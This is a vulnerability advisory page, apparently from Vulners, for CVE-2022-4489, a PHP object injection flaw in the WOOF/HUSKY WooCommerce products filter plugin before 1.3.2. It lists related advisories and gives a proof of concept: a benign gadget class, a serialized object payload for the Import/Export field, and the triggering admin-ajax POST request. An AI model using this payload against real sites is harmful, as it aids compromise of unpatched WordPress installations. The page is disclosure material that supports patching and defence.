Vulnerability in WOOF - Products Filter for WooCommerce < 1.3.2 allows PHP Object Injectio
Reporter | Title | Published | Views | Family All 7 |
---|---|---|---|---|
NVD | CVE-2022-4489 | 6 Feb 202320:15 | – | nvd |
CVE | CVE-2022-4489 | 6 Feb 202320:15 | – | cve |
Patchstack | WordPress HUSKY Plugin < 1.3.2 is vulnerable to PHP Object Injection | 11 Jan 202300:00 | – | patchstack |
OpenVAS | WordPress HUSKY - Products Filter for WooCommerce Professional Plugin < 1.3.2 PHP Object Injection Vulnerability | 23 May 202300:00 | – | openvas |
WPVulnDB | WOOF - Products Filter for WooCommerce < 1.3.2 - Admin+ PHP Object Injection | 11 Jan 202300:00 | – | wpvulndb |
Prion | Design/Logic Flaw | 6 Feb 202320:15 | – | prion |
Cvelist | CVE-2022-4489 WOOF - Products Filter for WooCommerce < 1.3.2 - Admin+ PHP Object Injection | 6 Feb 202319:59 | – | cvelist |
1. To simulate a gadget chain, put the following code in a plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
2. First, enable Import/Export extension: WooCommerce > Settings > Products Filter > Extensions > Tick the box Import/Export > Save changes (requires the "WooCommerce" plugin to be active)
3. Use "Export/Import" function in WooCommerce > Settings > Products Filter > Advanced > Export/Import, and enter with the following content: {"evil":"O:4:\"Evil\":0:{}"}
4. When clicking "Import placed data", click "OK", We will get an "Arbitrary deserialization" message.
POST /wp-admin/admin-ajax.php HTTP/1.1
action=woof_do_import_data&import_value=%7B%22evil%22%3A%22O%3A4%3A%5C%22Evil%5C%22%3A0%3A%7B%7D%22%7D
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo